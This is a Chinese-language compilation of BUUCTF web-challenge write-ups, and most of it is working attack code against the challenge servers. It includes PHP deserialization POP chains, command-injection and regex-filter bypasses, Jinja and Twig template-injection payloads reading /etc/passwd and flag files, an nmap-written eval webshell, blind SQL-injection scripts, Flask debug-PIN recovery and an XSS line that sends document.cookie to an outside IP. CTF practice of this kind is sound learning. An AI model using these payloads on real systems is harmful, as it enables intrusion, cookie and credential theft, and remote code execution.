1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 <?php include 'flag.php' ;$yds = "dog" ;$is = "cat" ;$handsome = 'yds' ;foreach ($_POST as $x => $y ){ $$x = $y ; foreach ($_GET as $x => $y ){ $$x = $$y ; foreach ($_GET as $x => $y ){if ($_GET ['flag' ] === $x && $x !== 'flag' ){ exit ($handsome );if (!isset ($_GET ['flag' ]) && !isset ($_POST ['flag' ])){ exit ($yds );if ($_POST ['flag' ] === 'flag' || $_GET ['flag' ] === 'flag' ){ exit ($is );echo "the flag is: " .$flag ;
1 http://6e2a4e1e-f07f-4efe-9ac3-3ee42db544de.node5.buuoj.cn:81/?yds=flag
看robots
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 GET /fAke_f1agggg.php HTTP/1 .1 Host : 36627 a2d-0 bd3-4 b95-a5f3-c38ccccd1864.node5.buuoj.cn:81 Cache -Control: max-age=0 Accept : text/html,application/xhtml+xml,application/xml;q=0 .9 ,image/avif,image/webp,image/apng,*/*;q=0 .8 ,application/signed-exchange;v=b3;q=0 .7 Accept -Language: zh-CN,zh;q=0 .9 ,en;q=0 .8 ,en-GB;q=0 .7 ,en-US;q=0 .6 Upgrade -Insecure-Requests: 1 User -Agent: Mozilla/5 .0 (Windows NT 10 .0 ; Win64; x64) AppleWebKit/537 .36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537 .36 Edg/133.0.0.0 Referer : http://36627 a2d-0 bd3-4 b95-a5f3-c38ccccd1864.node5.buuoj.cn:81 /Accept -Encoding: gzip, deflateHTTP /1 .1 200 OKServer : openrestyDate : Mon, 17 Feb 2025 14 :18 :02 GMTContent -Type: text/htmlConnection : keep-aliveX -Powered-By: PHP/5 .5 .38 look_at_me : /fl4g.phpCache -Control: no-cacheContent -Length: 22 flag {this_is_not_flag}
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 <?php header ('Content-type:text/html;charset=utf-8' );error_reporting (0 );highlight_file (__file__);if (isset ($_GET ['num' ])){$num = $_GET ['num' ];if (intval ($num ) < 2020 && intval ($num + 1 ) > 2021 ){echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>" ;else {die ("金钱解决不了穷人的本质问题" );else {die ("去非洲吧" );if (isset ($_GET ['md5' ])){$md5 =$_GET ['md5' ];if ($md5 ==md5 ($md5 ))echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>" ;else die ("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲" );else {die ("去非洲吧" );if (isset ($_GET ['get_flag' ])){$get_flag = $_GET ['get_flag' ];if (!strstr ($get_flag ," " )){$get_flag = str_ireplace ("cat" , "wctf2020" , $get_flag );echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>" ;system ($get_flag );else {die ("快到非洲了" );else {die ("去非洲吧" );?>
1 2 3 4 5 6 7 8 9 GET /fl4g.php?num=2019e3&md5=0e215962017&get_flag=tac $IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag HTTP/1.1
考点我感觉最重要的其实是空格的绕过
1 {{_self.env.registerUndefinedFilterCallback ("exec" )}} {{_self.env.getFilter ("cat /flag" )}}
twig注入,在cookie处写入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 <?php class Modifier protected $var ='php://filter/convert.base64-encode/resource=flag.php' ;public function append ($value include ($value );public function __invoke ($this ->append ($this ->var );class Show public $source ;public $str ;public function __construct ($file ='index.php' $this ->source = $file ;echo 'Welcome to ' .$this ->source."<br>" ;public function __toString (return $this ->str->source;class Test public $p ;public function __construct ($this ->p = array ();public function __get ($key $function = $this ->p;return $function ();$exp =new Show ();$exp ->source=new show;$exp ->source->str=new Test ();$exp ->source->str->p=new Modifier ();echo urlencode (serialize ($exp ));
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 <?php error_reporting (E_ALL || ~ E_NOTICE);header ('content-type:text/html;charset=utf-8' );$cmd = $_GET ['cmd' ];if (!isset ($_GET ['img' ]) || !isset ($_GET ['cmd' ])) header ('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=' );$file = hex2bin (base64_decode (base64_decode ($_GET ['img' ])));$file = preg_replace ("/[^a-zA-Z0-9.]+/" , "" , $file );if (preg_match ("/flag/i" , $file )) {echo '<img src ="./ctf3.jpeg">' ;die ("xixi~ no flag" );else {$txt = base64_encode (file_get_contents ($file ));echo "<img src='data:image/gif;base64," . $txt . "'></img>" ;echo "<br>" ;echo $cmd ;echo "<br>" ;if (preg_match ("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i" , $cmd )) {echo ("forbid ~" );echo "<br>" ;else {if ((string )$_POST ['a' ] !== (string )$_POST ['b' ] && md5 ($_POST ['a' ]) === md5 ($_POST ['b' ])) {echo `$cmd `;else {echo ("md5 is funny ~" );?>
1 2 3 4 5 6 7 8 9 10 11 POST /index.php?cmd=ca\t%20/\f\l\a\g&img=qwe HTTP/1.1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import flaskimport os'FLAG' ] = os.environ.pop('FLAG' )@app.route('/' def index ():return open (__file__).read()@app.route('/shrine/<path:shrine>' def shrine (shrine ):def safe_jinja (s ):'(' , '' ).replace(')' , '' )'config' , 'self' ]return '' .join(['{{% set {}=None%}}' .format (c) for c in blacklist]) + sreturn flask.render_template_string(safe_jinja(shrine))if __name__ == '__main__' :True )
1 http://ecf1c5a2-9330-4d7d-9475-4924e6ff3870.node5.buuoj.cn:81/shrine/{{url_for.__globals__['current_app' ].config}}
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 <?php $function = @$_GET ['f' ];function filter ($img $filter_arr = array ('php' ,'flag' ,'php5' ,'php4' ,'fl1g' );$filter = '/' .implode ('|' ,$filter_arr ).'/i' ;return preg_replace ($filter ,'' ,$img );if ($_SESSION ){unset ($_SESSION );$_SESSION ["user" ] = 'guest' ;$_SESSION ['function' ] = $function ;extract ($_POST );if (!$function ){echo '<a href="index.php?f=highlight_file">source_code</a>' ;if (!$_GET ['img_path' ]){$_SESSION ['img' ] = base64_encode ('guest_img.png' );else {$_SESSION ['img' ] = sha1 (base64_encode ($_GET ['img_path' ]));$serialize_info = filter (serialize ($_SESSION ));if ($function == 'highlight_file' ){highlight_file ('index.php' );else if ($function == 'phpinfo' ){eval ('phpinfo();' ); else if ($function == 'show_image' ){$userinfo = unserialize ($serialize_info );echo file_get_contents (base64_decode ($userinfo ['img' ]));
1 2 index.php?f =phpinfo
反序列化字符串逃逸
1 2 3 4 5 6 7 8 9 10 11 12 POST /index.php?f=show_image HTTP/1.1"img" ;s:20:"ZDBnM19mMWFnLnBocA==" ;i:0;i:1;}
1 2 3 4 5 6 7 8 9 10 11 12 POST /index.php?f=show_image HTTP/1.1"img" ;s:20:"L2QwZzNfZmxsbGxsbGFn" ;i:0;i:1;}
有n个php,用d盾扫了一下发现每个都有危险函数,直接网上扒的脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 import osimport requestsimport reimport threadingimport timeprint ('开始时间: ' + time.asctime( time.localtime(time.time()) ))100 ) r"D:/phpstudy_pro/WWW/src/src" 5 False def get_content (file ):print ('trying ' +file+ ' ' + time.asctime( time.localtime(time.time()) ))with open (file,encoding='utf-8' ) as f: list (re.findall('\$_GET\[\'(.*?)\'\]' , f.read()))list (re.findall('\$_POST\[\'(.*?)\'\]' , f.read()))for m in gets:"echo 'xxxxxx';" for n in posts:"echo 'xxxxxx';" 'http://localhost:63343/WWW/src/src/' +file 'utf-8' if "xxxxxx" in content: 0 for a in gets:'?%s=' %a+"echo 'xxxxxx';" )if "xxxxxx" in content:1 break if flag != 1 :for b in posts:"echo 'xxxxxx';" })if "xxxxxx" in content:break if flag == 1 : else :print ('找到了利用文件: ' +file+" and 找到了利用的参数:%s" %param)print ('结束时间: ' + time.asctime(time.localtime(time.time())))for i in files:
1 http ://00305 f35-0830 -4532 -bd50-4 eb9fa1e3886.node5.buuoj.cn:81 /xk0SzyKwfzw.php?Efa5BVG=cat /flag
参考上面的onlinetool
先输入
1 2 127.0.0.1 | ls ls (user)
尝试
1 ' <?php echo `cat /flag`;?> -oG test.php '
回显hack
1 127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
然后执行命令就好
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?php class HelloPhp public $a ;public $b ;public function __construct ($this ->a = "Y-m-d h:i:s" ;$this ->b = "date" ;public function __destruct ($a = $this ->a;$b = $this ->b;echo $b ($a );$c = new HelloPhp ;if (isset ($_GET ['source' ]))highlight_file (__FILE__ );die (0 );$ppp = unserialize ($_GET ["data" ]);2025 -02 -18 01 :13 :26
1 2 3 4 5 6 7 8 9 10 11 12 <?php class HelloPhp public $a ;public $b ;$exp =new HelloPhp ();$exp ->b='assert' ;$exp ->a='phpinfo()' ;echo serialize ($exp );
题目的要求其实就是找比1337大的单字符,可以去unicode查找
利用xff进行模板注入
1 X-Forwarded-For :{system ('cat /flag' )}
先尝试,发现没用
1 2 <script > fetch ('http://47.83.222.208:5566/1.php?x' +document .cookie )</script > <script > location.href ="http://47.83.222.208:5566/1.php?x=" +document .cookie </script >
尝试sql注入
1 1 '/**/union/**/select/**/1,2,3/**/'
1 1 '/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
这里过滤了or,information_schema
可以使用
1 mysql.innodb_table_stats where database_name= database()
1 1 '/**/union/**/select/**/1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'
1 1 '/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
这里利用了无字段名爆值,里面的先查询
查询会先返回一行 (1, 2, 3),然后返回 users 表中的所有数据。group_concat(b) 将会把所有的 b 列数据拼接起来。
其实waf我也waf没出来,没太懂异或的注入,也算是报错注入吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import requests'http://75652247-5ff2-4737-9cae-ce01dc7d1c08.node5.buuoj.cn:81/search.php?id=' '' for i in range (1 , 50 ):32 , 127 while head < tail:2 f"''or(ascii(substr((select(group_concat(password))from(F1naI1y)),{i} ,1))>{mid} )" if 'Click' in r.text:1 else :2 chr (mid)print (flag)if head == 32 :break
直接看源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?php error_reporting (0 );if (!isset ($_GET ['c' ])){show_source (__FILE__ );else {$content = $_GET ['c' ];if (strlen ($content ) >= 80 ) {die ("太长了不会算" );$blacklist = [' ' , '\t' , '\r' , '\n' ,'\'' , '"' , '`' , '\[' , '\]' ];foreach ($blacklist as $blackitem ) {if (preg_match ('/' . $blackitem . '/m' , $content )) {die ("请不要输入奇奇怪怪的字符" );$whitelist = ['abs' , 'acos' , 'acosh' , 'asin' , 'asinh' , 'atan2' , 'atan' , 'atanh' , 'base_convert' , 'bindec' , 'ceil' , 'cos' , 'cosh' , 'decbin' , 'dechex' , 'decoct' , 'deg2rad' , 'exp' , 'expm1' , 'floor' , 'fmod' , 'getrandmax' , 'hexdec' , 'hypot' , 'is_finite' , 'is_infinite' , 'is_nan' , 'lcg_value' , 'log10' , 'log1p' , 'log' , 'max' , 'min' , 'mt_getrandmax' , 'mt_rand' , 'mt_srand' , 'octdec' , 'pi' , 'pow' , 'rad2deg' , 'rand' , 'round' , 'sin' , 'sinh' , 'sqrt' , 'srand' , 'tan' , 'tanh' ];preg_match_all ('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/' , $content , $used_funcs ); foreach ($used_funcs [0 ] as $func ) {if (!in_array ($func , $whitelist )) {die ("请不要输入奇奇怪怪的函数" );eval ('echo ' .$content .';' );
已知的是php可以进行嵌套比如说
1 2 $orange='system';$orange('cat /flag');
所以可以尝试进行
1 ?c=($_GET [a])($_GET [b])&a=system&b=cat /flag
a和b不能用可以用函数代替
1 ?c=($ _GET[pi ])($ _GET[abs ])&pi =system &abs =cat /flag
有个老生常谈的函数hex2bin将十六进制进行转化为ASCII,_GET的十六进制是5f474554,但是也没有hex2bin,也不能填这些但是里面有个函数是base_convert,可以用这个函数构造hex2bin,36进制包含0-9和A-Z,转化为十进制就是37907361743
1 base_convert (37907361743 ,10 ,36 ) #构造出hex2bin
再利用函数dechex函数十进制转化为十六进制1598506324,构造的流程如下
1 2 3 4 base_convert (37907361743 ,10 ,36 )(dechex(1598506324 ));hex2bin (dechex(1598506324 ));hex2bin (5 f474554);
最后构造payload
1 ?c=$ pi =base_convert(37907361743 ,10 ,36 )(dechex(1598506324 ));($ $ pi ){pi }(($ $ pi ){abs })&pi =system &abs =tac /flag;
($_GET){pi}(($_GET){abs})然后传入内容执行代码
原题也可以利用getallheaders,但是本题的环境有些变化
先上payload,看看大佬的思路
1 2 3 4 5 6 7 8 9 10 11 12 13 ?c=$pi =(is_nan^(6 ).(4 )).(tan^(1 ).(5 ));$pi =$$pi ;$pi {0 }($pi {1 })&0 =system&1 =tac /flag;<?php $payload = ['abs' , 'acos' , 'acosh' , 'asin' , 'asinh' , 'atan2' , 'atan' , 'atanh' , 'bindec' , 'ceil' , 'cos' , 'cosh' , 'decbin' , 'decoct' , 'deg2rad' , 'exp' , 'expm1' , 'floor' , 'fmod' , 'getrandmax' , 'hexdec' , 'hypot' , 'is_finite' , 'is_infinite' , 'is_nan' , 'lcg_value' , 'log10' , 'log1p' , 'log' , 'max' , 'min' , 'mt_getrandmax' , 'mt_rand' , 'mt_srand' , 'octdec' , 'pi' , 'pow' , 'rad2deg' , 'rand' , 'round' , 'sin' , 'sinh' , 'sqrt' , 'srand' , 'tan' , 'tanh' ];for ($k =1 ;$k <=sizeof ($payload );$k ++){for ($i = 0 ;$i < 9 ; $i ++){for ($j = 0 ;$j <=9 ;$j ++){$exp = $payload [$k ] ^ $i .$j ;echo ($payload [$k ]."^$i $j " ."==>$exp " );echo "<br />" ;
这个脚本通过异或可以生成很多的字符,拼接最后就可以得到payload涨知识了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <?php error_reporting (0 );if (isset ($_GET ['code' ])){$code =$_GET ['code' ];if (strlen ($code )>40 ){die ("This is too Long." );if (preg_match ("/[A-Za-z0-9]+/" ,$code )){die ("NO." );eval ($code );else {highlight_file (__FILE__ );
1 2 3 4 5 6 7 <?php $a ="assert" ;$b ="(eval(\$_POST[cmd]))" ;$c =urlencode (~$a );$d =urlencode (~$b );echo ("?code=(~" .$c .")(~" .$d .");" )?>
蚁剑用插件连执行
或者用LD劫持
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 from flask import Flask, requestimport socketimport hashlibimport urllibimport sysimport osimport json'latin1' )16 )class Task :def __init__ (self, action, param, sign, ip ):self .action = actionself .param = paramself .sign = signself .sandbox = md5(ip)if not os.path.exists(self .sandbox):self .sandbox)def Exec (self ):'code' ] = 500 if self .checkSign():if "scan" in self .action:open ("./%s/result.txt" % self .sandbox, 'w' )self .param)if resp == "Connection Timeout" :'data' ] = respelse :print resp'code' ] = 200 if "read" in self .action:open ("./%s/result.txt" % self .sandbox, 'r' )'code' ] = 200 'data' ] = f.read()if result['code' ] == 500 :'data' ] = "Action Error" else :'code' ] = 500 'msg' ] = "Sign Error" return resultdef checkSign (self ):return getSign(self .action, self .param) == self .sign@app.route("/geneSign" , methods=['GET' , 'POST' ] def geneSign ():"param" , "" ))"scan" return getSign(action, param)@app.route('/De1ta' , methods=['GET' , 'POST' ] def challenge ():"action" ))"param" , "" ))"sign" ))if waf(param):return "No Hacker!!!!" return json.dumps(task.Exec())@app.route('/' def index ():return open ("code.txt" , "r" ).read()def scan (param ):1 )try :return urllib.urlopen(param).read()[:50 ]except :return "Connection Timeout" def getSign (action, param ):return hashlib.md5(secert_key + param + action).hexdigest()def md5 (content ):return hashlib.md5(content).hexdigest()def waf (param ):if check.startswith("gopher" ) or check.startswith("file" ):return True else :return False if __name__ == '__main__' :False '0.0.0.0' , port=80 )
1 /geneSign?param =flag.txtread
1 2 /De1ta?param =flag.txtaction =readscan;sign=819ef9a9800ac15546b246d3e41d2154;
也是扫不了,buu平台大部分的都会弹429,看一下题目
1 http ://6306 a09b-f1f5-46 ed-a023-63 c63bacb767.node5.buuoj.cn:81 /index.php.swp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 <?php ob_start ();function get_hash ($chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-' ;$random = $chars [mt_rand (0 ,73 )].$chars [mt_rand (0 ,73 )].$chars [mt_rand (0 ,73 )].$chars [mt_rand (0 ,73 )].$chars [mt_rand (0 ,73 )];$content = uniqid ().$random ;return sha1 ($content ); header ("Content-Type: text/html;charset=utf-8" );if (isset ($_POST ['username' ]) and $_POST ['username' ] != '' )$admin = '6d0bc1' ;if ( $admin == substr (md5 ($_POST ['password' ]),0 ,6 )) {echo "<script>alert('[+] Welcome to manage system')</script>" ;$file_shtml = "public/" .get_hash ().".shtml" ;$shtml = fopen ($file_shtml , "w" ) or die ("Unable to open file!" );$text = ' *** *** <h1>Hello,' .$_POST ['username' ].'</h1> *** ***' ;fwrite ($shtml ,$text );fclose ($shtml );echo "[!] Header error ..." ;else {echo "<script>alert('[!] Failed')</script>" ;else ?>
先爆破一下
1 2 3 4 5 6 7 8 9 10 11 12 13 import hashlib'6d0bc1' for i in range (10000000 ):str (i).zfill(6 ) if hash_md5[:6 ] == target:print (f"Found password: {password} " )break
登录成功后,未过滤的$_POST['username']直接写入.shtml文件
若服务器启用SSI(Server Side Includes),可构造恶意用户名注入SSI指令
提示:public/2cdabc9bda70f7f3c537f020be9aa2ef02a4db69.shtml
1 http://29d03887-2e28-449d-97a5-32e18c964cbe.node5.buuoj.cn/console
有弹窗的,应该考察的是python的pin吧
先尝试一下
1 2 {{{}.__class__.__mro__ [-1].__subclasses__()[102].__init__.__globals__['open']('/etc/passwd' ).read()}} e3t7fS5fX2NsYXNzX18uX19tcm9fX1stMV0uX19zdWJjbGFzc2VzX18oKVsxMDJdLl9faW5pdF9fLl9fZ2xvYmFsc19fWydvcGVuJ10oJy9ldGMvcGFzc3dkJykucmVhZCgpfX0NCg ==
1 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync :x:4:65534:sync :/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin flaskweb:x:1000:1000::/home/flaskweb:/bin/sh
1 路径:/usr/local/lib/python3 .7 /site-packages/flask/app.py
1 2 3 4 {{{}.__class__.__mro__ [-1].__subclasses__()[102].__init__.__globals__['open']('/sys/class/net/eth0/address' ).read()}} e3t7fS5fX2NsYXNzX18uX19tcm9fX1stMV0uX19zdWJjbGFzc2VzX18oKVsxMDJdLl9faW5pdF9fLl9fZ2xvYmFsc19fWydvcGVuJ10oJy9zeXMvY2xhc3MvbmV0L2V0aDAvYWRkcmVzcycpLnJlYWQoKX19 12 :a3:50:49:14:8e#mac地址
1 2 3 4 {{{}.__class__.__mro__ [-1].__subclasses__()[102].__init__.__globals__['open']('/proc/self/cgroup' ).read()}} e3t7fS5fX2NsYXNzX18uX19tcm9fX1stMV0uX19zdWJjbGFzc2VzX18oKVsxMDJdLl9faW5pdF9fLl9fZ2xvYmFsc19fWydvcGVuJ10oJy9wcm9jL3NlbGYvY2dyb3VwJykucmVhZCgpfX0 =2304 f2d299bd73bcfe2a090fa3f07be99553be66d6c89806e71cbaf858fbf7e72 ba422d5480704d63dbd229aac7073a77b7e06f7c9b017ca337a798ea3146f03
1 {{{}.__class__.__mro__ [-1].__subclasses__()[102].__init__.__globals__['open']('/etc/machine-id' ).read()}}
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 import hashlibfrom itertools import chain'flaskweb' ,'flask.app' ,'Flask' ,'/usr/local/lib/python3.7/site-packages/flask/app.py' ,'20492635935886' ,'2304f2d299bd73bcfe2a090fa3f07be99553be66d6c89806e71cbaf858fbf7e7' for bit in chain(probably_public_bits, private_bits):if not bit:continue if isinstance (bit, str ):'utf-8' )b'cookiesalt' )'__wzd' + h.hexdigest()[:20 ]None if num is None :b'pinsalt' )'%09d' % int (h.hexdigest(), 16 ))[:9 ]None if rv is None :for group_size in 5 , 4 , 3 :if len (num) % group_size == 0 :'-' .join(num[x:x + group_size].rjust(group_size, '0' )for x in range (0 , len (num), group_size))break else :print (rv)
原理都是对的不知道为什么跑不出来
读取app.py
1 2 {{{}.__class__.__mro__ [-1].__subclasses__()[102].__init__.__globals__['open']('app.py' ).read()}} e3t7fS5fX2NsYXNzX18uX19tcm9fX1stMV0uX19zdWJjbGFzc2VzX18oKVsxMDJdLl9faW5pdF9fLl9fZ2xvYmFsc19fWydvcGVuJ10oJ2FwcC5weScpLnJlYWQoKX19
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 from flask import Flask, render_template, request, flash, redirect, url_for, abortfrom flask_wtf import FlaskFormfrom wtforms import StringField, SubmitFieldfrom wtforms.validators import DataRequiredfrom flask_bootstrap import Bootstrapimport base64import os'SECRET_KEY' ] = os.getenv('SECRET_KEY' , 's_e_c_r_e_t_k_e_y' ) class NameForm (FlaskForm ):'BASE64加密' , validators=[DataRequired()])'提交' )class NameForm1 (FlaskForm ):'BASE64解密' , validators=[DataRequired()])'提交' )def waf (str "flag" , "os" , "system" , "popen" , "import" , "eval" , "chr" , "request" , "subprocess" , "commands" , "socket" , "hex" , "base64" , "*" , "?" for x in black_list:if x in str .lower():403 ) @app.route('/hint' , methods=['GET' ] def hint ():"失败乃成功之母!!" return render_template("hint.html" , txt=txt)@app.route('/' , methods=['POST' , 'GET' ] def encode ():if request.form.get('text' ):"text" )"结果 : {0}" .format (text_encode)return redirect(url_for('encode' ))else :return render_template("index.html" , form=form, method="加密" , img="flask.png" )@app.route('/decode' , methods=['POST' , 'GET' ] def decode ():if request.form.get('text' ):"text" )try :except Exception as e:"无效的 base64 字符串" )return redirect(url_for('decode' ))if waf(text_decode):"no no no !!" )return redirect(url_for('decode' ))"结果 : {0}" .format (text_decode)return redirect(url_for('decode' ))else :return render_template("index.html" , form=form, method="解密" , img="flask1.png" )@app.route('/<name>' , methods=['GET' ] def not_found (name ):return render_template("404.html" , name=name)if __name__ == '__main__' :"0.0.0.0" , port=5000 , debug=True )
1 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__' ].open ('txt.galf_eht_si_siht/' [::-1 ],'r' ).read() }}{% endif %}{% endfor %}
参考2019年的极客大挑战
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import requests'http://5cdb17da-f3cb-48d7-9db4-88e23596213f.node5.buuoj.cn:81/?stunum=' '' for i in range (1 , 50 ):32 , 127 while head < tail:2 f"''or(ascii(substr((select(group_concat(value))from(flag)),{i} ,1))>{mid} )" if 'admin' in r.text:1 else :2 chr (mid)print (flag)if head == 32 :break
buu没给附件,去网上找一个
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php putenv ('PATH=/home/rceservice/jail' );if (isset ($_REQUEST ['cmd' ])) {$json = $_REQUEST ['cmd' ];if (!is_string ($json )) {echo 'Hacking attempt detected<br/><br/>' ;elseif (preg_match ('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/' , $json )) {echo 'Hacking attempt detected<br/><br/>' ;else {echo 'Attempting to run command:<br/>' ;$cmd = json_decode ($json , true )['cmd' ];if ($cmd !== NULL ) {system ($cmd );else {echo 'Invalid input' ;echo '<br/><br/>' ;?>
PCRE绕过
1 2 3 4 5 6 7 import requests'{"cmd":"/bin/cat /home/rceservice/flag", "abc":"' + 'a' * 1000000 + '"}' "http://ea3b493e-2225-4f14-a9cc-394b71027a36.node5.buuoj.cn:81/" ,data={"cmd" : payload})print (res.text)
正则表达式是 ^...$ 格式 如果没有修饰符m 那么^只会匹配第一行的内容
1 ?cmd={%0a"cmd" :"/bin/cat /home/rceservice/flag" %0a}
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 from flask import Flask, requestfrom urllib import parsefrom urllib.parse import urlsplit, urlunsplitimport urllib.request@app.route('/getUrl' , methods=['GET' , 'POST' ] def getUrl ():"url" )if host == 'suctf.cc' :return "我扌 your problem? 111" list (urlsplit(url))1 ]if host == 'suctf.cc' :return "我扌 your problem? 222 " + hostfor h in host.split('.' ):'idna' ).decode('utf-8' ))1 ] = '.' .join(newhost)' ' )[0 ]if host == 'suctf.cc' :return urllib.request.urlopen(finalUrl).read()else :return "我扌 your problem? 333" if __name__ == '__main__' :
感觉是unicode的绕过读取
1 file:// suctf.c%E2%84 %82 /../ ../../ ../../ ../usr/ fffffflag
buu的环境问题,读不了了
扫不了,看一下有register.php和config.php,发现有www.zip,源码泄露下载看一下内容
可以看到一堆正则过滤了收集到的信息,最后序列化作为update_profile的参数
模拟一下序列化数据
1 2 3 4 5 6 7 8 <?php $profile ['phone' ] = '139999999999' ;$profile ['email' ] = '1@1.com' ;$profile ['nickname' ] = '1' ;$profile ['photo' ] = 'upload/' ;$temp =serialize ($profile );var_dump ($temp );?>
filter函数如下,明显本题是字符增多的类型
1 2 3 4 5 6 7 8 public function filter ($string $escape = array ('\'' , '\\\\' );$escape = '/' . implode ('|' , $escape ) . '/' ;$string = preg_replace ($escape , '_' , $string );$safe = array ('select' , 'insert' , 'update' , 'delete' , 'where' );$safe = '/' . implode ('|' , $safe ) . '/i' ;return preg_replace ($safe , 'hacker' , $string );
简化来看
